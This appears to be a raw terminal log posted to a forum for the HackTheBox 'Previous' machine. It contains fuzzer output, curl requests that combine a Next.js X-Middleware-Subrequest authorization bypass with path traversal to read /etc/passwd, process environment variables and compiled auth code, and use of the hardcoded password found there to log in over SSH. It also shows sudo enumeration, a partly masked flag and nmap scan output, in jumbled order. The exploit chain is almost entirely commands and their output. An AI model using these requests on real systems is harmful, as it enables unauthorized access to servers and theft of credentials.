req/sec :: Du:: Progress: [2733/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [2769/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [2773/74332] :: Job [1/1] :: 141 req/sec :: Du:: Progress: [2780/74332] :: Job [1/1] :: 127 req/sec :: Du:: Progress: [2789/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [2823/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [2829/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [2862/74332] :: Job [1/1] :: 147 req/sec :: Du:: Progress: [2867/74332] :: Job [1/1] :: 134 req/sec :: Du:: Progress: [2902/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [2902/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [2902/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [2905/74332] :: Job [1/1] :: 122 req/sec :: Du:: Progress: [2924/74332] :: Job [1/1] :: 113 req/sec :: Du:: Progress: [2937/74332] :: Job [1/1] :: 124 req/sec :: Du:: Progress: [2946/74332] :: Job [1/1] :: 109 req/sec :: Du:: Progress: [2977/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [2983/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [3018/74332] :: Job [1/1] :: 119 req/sec :: Du:: Progress: [3023/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [3058/74332] :: Job [1/1] :: 121 req/sec :: Du:: Progress: [3063/74332] :: Job [1/1] :: 130 req/sec :: Du:: Progress: [3103/74332] :: Job [1/1] :: 154 req/sec :: Du:: Progress: [3104/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [3143/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [3148/74332] :: Job [1/1] :: 163 req/sec :: Du:: Progress: [3183/74332] :: Job [1/1] :: 198 req/sec :: Du:: Progress: [3191/74332] :: Job [1/1] :: 170 req/sec :: Du:: Progress: [3224/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [3237/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [3268/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [3295/74332] :: Job [1/1] :: 170 req/sec :: Du:: Progress: [3308/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [3314/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [3354/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [3354/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [3394/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [3394/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [3434/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [3445/74332] :: Job [1/1] :: 161 req/sec :: Du:: Progress: [3464/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [3471/74332] :: Job [1/1] :: 157 req/sec :: Du:: Progress: [3505/74332] :: Job [1/1] :: 159 req/sec :: Du:: Progress: [3511/74332] :: Job [1/1] :: 159 req/sec :: Du:: Progress: [3551/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [3553/74332] :: Job [1/1] :: 145 req/sec :: Du:: Progress: [3565/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [3565/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [3605/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [3605/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [3641/74332] :: Job [1/1] :: 143 req/sec :: Du:: Progress: [3650/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [3683/74332] :: Job [1/1] :: 150 req/sec :: Du:: Progress: [3701/74332] :: Job [1/1] :: 140 req/sec :: Du:: Progress: [3725/74332] :: Job [1/1] :: 153 req/sec :: Du:: Progress: [3744/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [3765/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [3778/74332] :: Job [1/1] :: 170 req/sec :: Du:: Progress: [3806/74332] :: Job [1/1] :: 182 req/sec :: Du:: Progress: [3834/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [3849/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [3874/74332] :: Job [1/1] :: 169 req/sec :: Du:: Progress: [3890/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [3909/74332] :: Job [1/1] :: 161 req/sec :: Du:: Progress: [3924/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [3933/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [3947/74332] :: Job [1/1] :: 151 req/sec :: Du:: Progress: [3973/74332] :: Job [1/1] :: 162 req/sec :: Du:: Progress: [3985/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [4003/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [4016/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [4043/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [4054/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [4084/74332] :: Job [1/1] :: 137 req/sec :: Du:: Progress: [4106/74332] :: Job [1/1] :: 144 req/sec :: Du:: Progress: [4128/74332] :: Job [1/1] :: 147 req/sec :: Du:: Progress: [4160/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [4168/74332] :: Job [1/1] :: 158 req/sec :: Du:: Progress: [4179/74332] :: Job [1/1] :: 148 req/sec :: Du:: Progress: [4208/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [4242/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [4248/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [4288/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [4289/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [4328/74332] :: Job [1/1] :: 202 req/sec :: Du:: Progress: [4338/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [4362/74332] :: Job [1/1] :: 161 req/sec :: Du:: Progress: [4379/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [4408/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [4426/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [4448/74332] :: Job [1/1] :: 198 req/sec :: Du:: Progress: [4459/74332] :: Job [1/1] :: 182 req/sec :: Du:: Progress: [4493/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [4493/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [4502/74332] :: Job [1/1] :: 153 req/sec :: Du:: Progress: [4521/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [4525/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [4562/74332] :: Job [1/1] :: 146 req/sec :: Du:: Progress: [4568/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [4603/74332] :: Job [1/1] :: 141 req/sec :: Du:: Progress: [4608/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [4645/74332] :: Job [1/1] :: 137 req/sec :: Du:: Progress: [4652/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [4685/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [4693/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [4725/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [4741/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [4767/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [4790/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [4811/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [4837/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [4854/74332] :: Job [1/1] :: 190 req/sec :: Du:: Progress: [4886/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [4894/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [4924/74332] :: Job [1/1] :: 174 req/sec :: Du:: Progress: [4936/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [4974/74332] :: Job [1/1] :: 192 req/sec :: Du:: Progress: [4982/74332] :: Job [1/1] :: 174 req/sec :: Du:: Progress: [5014/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [5028/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [5054/74332] :: Job [1/1] :: 194 req/sec :: Du:: Progress: [5065/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [5094/74332] :: Job [1/1] :: 192 req/sec :: Du:: Progress: [5105/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [5137/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [5147/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [5185/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [5190/74332] :: Job [1/1] :: 169 req/sec :: Du:: Progress: [5204/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [5231/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [5256/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [5274/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [5310/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [5314/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [5350/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [5357/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [5391/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [5411/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [5434/74332] :: Job [1/1] :: 189 req/sec :: Du:: Progress: [5460/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [5476/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [5510/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [5516/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [5555/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [5568/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [5596/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [5621/74332] :: Job [1/1] :: 181 req/sec :: Duexample [Status: 404, Size: 26, Words: 3, Lines: 1, Duration: 216ms]
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=aaa' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Host previous.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.83
* Trying 10.10.11.83:80...
* Connected to previous.htb (10.10.11.83) port 80
* using HTTP/1.x
> GET /api/download?example=aaa HTTP/1.1
> Host: previous.htb
> User-Agent: curl/8.13.0
> Accept: /
> X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
>
* Request completely sent off
< HTTP/1.1 404 Not Found
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 04 Sep 2025 05:42:08 GMT < Content-Type: application/json; charset=utf-8
< Content-Length: 26
< Connection: keep-alive
< ETag: "c8wflmak5q"
< Vary: Accept-Encoding
<
{ [26 bytes data]
100 26 100 26 0 0 52 0 --:--:-- --:-100 26 100 26 0 0 52 0 --:--:-- --:--:-- --:--:-- 52
* Connection #0 to host previous.htb left intact
{"error":"File not found"}
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../etc/passwd' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Host previous.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.83
* Trying 10.10.11.83:80...
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to previous.htb (10.10.11.83) port 80
* using HTTP/1.x
> GET /api/download?example=../../../../etc/passwd HTTP/1.1
> Host: previous.htb
> User-Agent: curl/8.13.0
> Accept: /
> X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 04 Sep 2025 05:46:17 GMT
< Content-Type: application/zip
< Content-Length: 787
< Connection: keep-alive
< Content-Disposition: attachment; filename=../../../../etc/passwd
< ETag: "41amqg1v4m26j"
<
{ [787 bytes data]
100 787 100 787 0 0 1788 0 --:--:-- --:--:-- --:--:-- 1788
* Connection #0 to host previous.htb left intact
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../proc/self/environ' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' --output - | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- --:-100 216 100 216 0 0 472 0 --:--:-- --:--:-- --:--:-- 472
NODE_VERSION=18.20.8HOSTNAME=0.0.0.0YARN_VERSION=1.22.22SHL
VL=1PORT=3000HOME=/home/nextjsPATH=/usr/local/sbin:/usr/loc
al/bin:/usr/sbin:/usr/bin:/sbin:/binNEXT_TELEMETRY_DISABLED
=1PWD=/appNODE_ENV=production
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../app/.next/routes-manifest.json' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -s | jq .
{
"version": 3,
"pages404": true,
"caseSensitive": false,
"basePath": "",
"redirects": [
{
"source": "/:path+/",
"destination": "/:path+",
"internal": true,
"statusCode": 308,
"regex": "^(?:/((?:[^/]+?)(?:/(?:[^/]+?))*))/$"
}
],
"headers": [],
"dynamicRoutes": [
{
"page": "/api/auth/[...nextauth]",
"regex": "^/api/auth/(.+?)(?:/)?$",
"routeKeys": {
"nxtPnextauth": "nxtPnextauth"
},
"namedRegex": "^/api/auth/(?<nxtPnextauth>.+?)(?:/)?$"
},
{
"page": "/docs/[section]",
"regex": "^/docs/([^/]+?)(?:/)?$",
"routeKeys": {
"nxtPsection": "nxtPsection"
},
"namedRegex": "^/docs/(?<nxtPsection>[^/]+?)(?:/)?$"
}
],
"staticRoutes": [
{
"page": "/",
"regex": "^/(?:/)?$",
"routeKeys": {},
"namedRegex": "^/(?:/)?$"
},
{
"page": "/docs",
"regex": "^/docs(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs(?:/)?$"
},
{
"page": "/docs/components/layout",
"regex": "^/docs/components/layout(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/layout(?:/)?$"
},
{
"page": "/docs/components/sidebar",
"regex": "^/docs/components/sidebar(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/sidebar(?:/)?$"
},
{
"page": "/docs/content/examples",
"regex": "^/docs/content/examples(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/examples(?:/)?$"
},
{
"page": "/docs/content/getting-started",
"regex": "^/docs/content/getting\\-started(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/getting\\-started(?:/)?$"
},
{
"page": "/signin",
"regex": "^/signin(?:/)?$",
"routeKeys": {},
"namedRegex": "^/signin(?:/)?$"
}
],
"dataRoutes": [],
"rsc": {
"header": "RSC",
"varyHeader": "RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch",
"prefetchHeader": "Next-Router-Prefetch",
"didPostponeHeader": "x-nextjs-postponed",
"contentTypeHeader": "text/x-component",
"suffix": ".rsc",
"prefetchSuffix": ".prefetch.rsc",
"prefetchSegmentHeader": "Next-Router-Segment-Prefetch",
"prefetchSegmentSuffix": ".segment.rsc",
"prefetchSegmentDirSuffix": ".segments"
},
"rewriteHeaders": {
"pathHeader": "x-nextjs-rewritten-path",
"queryHeader": "x-nextjs-rewritten-query"
},
"rewrites": []
}
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- --:-100 1537 100 1537 0 0 3197 0 --:--:-- --:--:-- --:--:-- 3202
"use strict";(()=>{var e={};e.id=651,e.ids=[651],e.modules=
{3480:(e,n,r)=>{e.exports=r(5600)},5600:e=>{e.exports=requi
re("next/dist/compiled/next-server/pages-api.runtime.prod.j
s")},6435:(e,n)=>{Object.defineProperty(n,"M",{enumerable:!
0,get:function(){return function e(n,r){return r in n?n[r]:
"then"in n&&"function"==typeof n.then?n.then(n=>e(n,r)):"fu
nction"==typeof n&&"default"===r?n:void 0}}})},8667:(e,n)=>
{Object.defineProperty(n,"A",{enumerable:!0,get:function(){
return r}});var r=function(e){return e.PAGES="PAGES",e.PAGE
S_API="PAGES_API",e.APP_PAGE="APP_PAGE",e.APP_ROUTE="APP_RO
UTE",e.IMAGE="IMAGE",e}({})},9832:(e,n,r)=>{r.r(n),r.d(n,{c
onfig:()=>l,default:()=>P,routeModule:()=>A});var t={};r.r(
t),r.d(t,{default:()=>p});var a=r(3480),s=r(8667),i=r(6435)
;let u=require("next-auth/providers/credentials"),o={sessio
n:{strategy:"jwt"},providers:[r.n(u)()({name:"Credentials",
credentials:{username:{label:"User",type:"username"},passwo
rd:{label:"Password",type:"password"}},authorize:async e=>e
?.username==="jeremy"&&e.password===(process.env.ADMIN_SECR
ET??"MyNameIsJeremyAndILovePancakes")?{id:"1",name:"Jeremy"
}:null})],pages:{signIn:"/signin"},secret:process.env.NEXTA
UTH_SECRET},d=require("next-auth"),p=r.n(d)()(o),P=(0,i.M)(
t,"default"),l=(0,i.M)(t,"config"),A=new a.PagesAPIRouteMod
ule({definition:{kind:s.A.PAGES_API,page:"/api/auth/[...nex
tauth]",pathname:"/api/auth/[...nextauth]",bundlePath:"",fi
lename:""},userland:t})}};var n=require("../../../webpack-a
pi-runtime.js");n.C(e);var r=n(n.s=9832);module.exports=r})
();
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # ssh jeremy@previous.htb
jeremy@previous.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-152-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Sep 4 05:50:20 AM UTC 2025
System load: 0.09 Processes: 215
Usage of /: 69.3% of 8.76GB Users logged in: 0
Memory usage: 8% IPv4 address for eth0: 10.10.11.83
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable
1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Sep 4 05:50:53 2025 from 10.10.14.25
jeremy@previous:~$ id
uid=1000(jeremy) gid=1000(jeremy) groups=1000(jeremy)
jeremy@previous:~$ whoami
jeremy
jeremy@previous:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
jeremy:x:1000:1000:,,,:/home/jeremy:/bin/bash
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
jeremy@previous:~$ sudo -l
[sudo] password for jeremy:
Sorry, try again.
[sudo] password for jeremy:
Matching Defaults entries for jeremy on previous:
!env_reset, env_delete+=PATH, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User jeremy may run the following commands on previous:
(root) /usr/bin/terraform -chdir\=/opt/examples apply
jeremy@previous:~$ ls -al
total 36
drwxr-x--- 4 jeremy jeremy 4096 Aug 21 20:24 .
drwxr-xr-x 3 root root 4096 Aug 21 20:09 ..
lrwxrwxrwx 1 root root 9 Aug 21 19:57 .bash_history -> /dev/null
-rw-r--r-- 1 jeremy jeremy 220 Aug 21 17:28 .bash_logout
-rw-r--r-- 1 jeremy jeremy 3771 Aug 21 17:28 .bashrc
drwx------ 2 jeremy jeremy 4096 Aug 21 20:09 .cache
drwxr-xr-x 3 jeremy jeremy 4096 Aug 21 20:09 docker
-rw-r--r-- 1 jeremy jeremy 807 Aug 21 17:28 .profile
-rw-rw-r-- 1 jeremy jeremy 150 Aug 21 18:48 .terraformrc
-rw-r----- 1 root jeremy 33 Sep 4 04:01 user.txt
jeremy@previous:~$ cat user.txt
b4b0379688c2834*********
05.09.2025, 04:33

Loading component...

HackTheBox Previous S8 User.txt - BreachStars

DefaltXploit
User
- Posts:4
- Topics:3
- Leaks:3
- Reputation:0
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # nmap -d --unprivileged -Pn -sVC --min-rate 200 $IPHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-03 17:57 UTC
PORTS: Using ports open on 0% or more average hosts (TCP:1000, UDP:0, SCTP:0)
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 200, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.4.
NSE: Arguments from CLI:
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:57
Completed NSE at 17:57, 0.00s elapsed
mass_rdns: Using DNS server 8.8.8.8
Initiating Connect Scan at 17:57
Scanning previous.htb (10.10.11.83) [1000 ports]
Discovered open port 22/tcp on 10.10.11.83
Discovered open port 80/tcp on 10.10.11.83
Increased max_successful_tryno for 10.10.11.83 to 1 (packet drop)
Increased max_successful_tryno for 10.10.11.83 to 2 (packet drop)
Increasing send delay for 10.10.11.83 from 0 to 5 due to 40 out of 132 dropped probes since last increase.
Increased max_successful_tryno for 10.10.11.83 to 3 (packet drop)
Increasing send delay for 10.10.11.83 from 5 to 10 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 10 to 20 due to 18 out of 58 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 20 to 40 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 40 to 80 due to 17 out of 56 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 80 to 160 due to 17 out of 55 dropped probes since last increase.
Increasing send delay for 10.10.11.83 from 160 to 320 due to 22 out of 73 dropped probes since last increase.
Increased max_successful_tryno for 10.10.11.83 to 4 (packet drop)
Increasing send delay for 10.10.11.83 from 320 to 640 due to max_successful_tryno increase to 4
Increased max_successful_tryno for 10.10.11.83 to 5 (packet drop)
Increasing send delay for 10.10.11.83 from 640 to 1000 due to max_successful_tryno increase to 5
Completed Connect Scan at 17:57, 8.95s elapsed (1000 total ports)
Overall sending rates: 223.30 packets / s.
Initiating Service scan at 17:57
Scanning 2 services on previous.htb (10.10.11.83)
Completed Service scan at 17:57, 6.46s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:57
NSE: Starting vmware-version against 10.10.11.83:80.
NSE: Starting xmlrpc-methods against 10.10.11.83:80.
NSE: Starting address-info against 10.10.11.83.
NSE: Finished address-info against 10.10.11.83.
NSE: Starting http-ls against 10.10.11.83:80.
NSE: Starting http-webdav-scan against 10.10.11.83:80.
NSE: Starting http-auth against 10.10.11.83:80.
NSE: Starting sshv1 against 10.10.11.83:22.
NSE: Starting http-ntlm-info against 10.10.11.83:80.
NSE: Starting http-svn-enum against 10.10.11.83:80.
NSE: Starting http-trane-info against 10.10.11.83:80.
NSE: Starting hnap-info against 10.10.11.83:80.
NSE: Starting http-svn-info against 10.10.11.83:80.
NSE: Starting ssh-hostkey against 10.10.11.83:22.
NSE: Starting http-robots.txt against 10.10.11.83:80.
NSE: Starting http-title against 10.10.11.83:80.
NSE: Starting https-redirect against 10.10.11.83:80.
NSE: Starting http-cookie-flags against 10.10.11.83:80.
NSE: [http-cookie-flags 10.10.11.83:80] start check of /
NSE: Starting http-cors against 10.10.11.83:80.
NSE: Starting http-favicon against 10.10.11.83:80.
NSE: Starting http-generator against 10.10.11.83:80.
NSE: Starting http-git against 10.10.11.83:80.
NSE: Starting http-methods against 10.10.11.83:80.
NSE: [vmware-version 10.10.11.83:80] Couldn't download file: /sdk
NSE: Finished vmware-version against 10.10.11.83:80.
NSE: Finished xmlrpc-methods against 10.10.11.83:80.
NSE: Finished http-ls against 10.10.11.83:80.
NSE: Finished http-svn-info against 10.10.11.83:80.
NSE: Finished http-git against 10.10.11.83:80.
NSE: Finished http-svn-enum against 10.10.11.83:80.
NSE: [http-trane-info 10.10.11.83:80] HTTP: Host returns proper 404 result.
NSE: [http-methods 10.10.11.83:80] HTTP Status for OPTIONS is 405
NSE: Finished http-robots.txt against 10.10.11.83:80.
NSE: Finished https-redirect against 10.10.11.83:80.
NSE: [hnap-info 10.10.11.83:80] HTTP: Host returns proper 404 result.
NSE: Finished sshv1 against 10.10.11.83:22.
NSE: Finished http-webdav-scan against 10.10.11.83:80.
NSE: Finished http-trane-info against 10.10.11.83:80.
NSE: [http-methods 10.10.11.83:80] Response Code to Random Method is 400
NSE: Finished hnap-info against 10.10.11.83:80.
NSE: Finished http-auth against 10.10.11.83:80.
NSE: Finished http-ntlm-info against 10.10.11.83:80.
NSE: Finished http-title against 10.10.11.83:80.
NSE: [http-cookie-flags 10.10.11.83:80] end check of / : 0 issues found
NSE: Finished http-cookie-flags against 10.10.11.83:80.
NSE: Finished http-generator against 10.10.11.83:80.
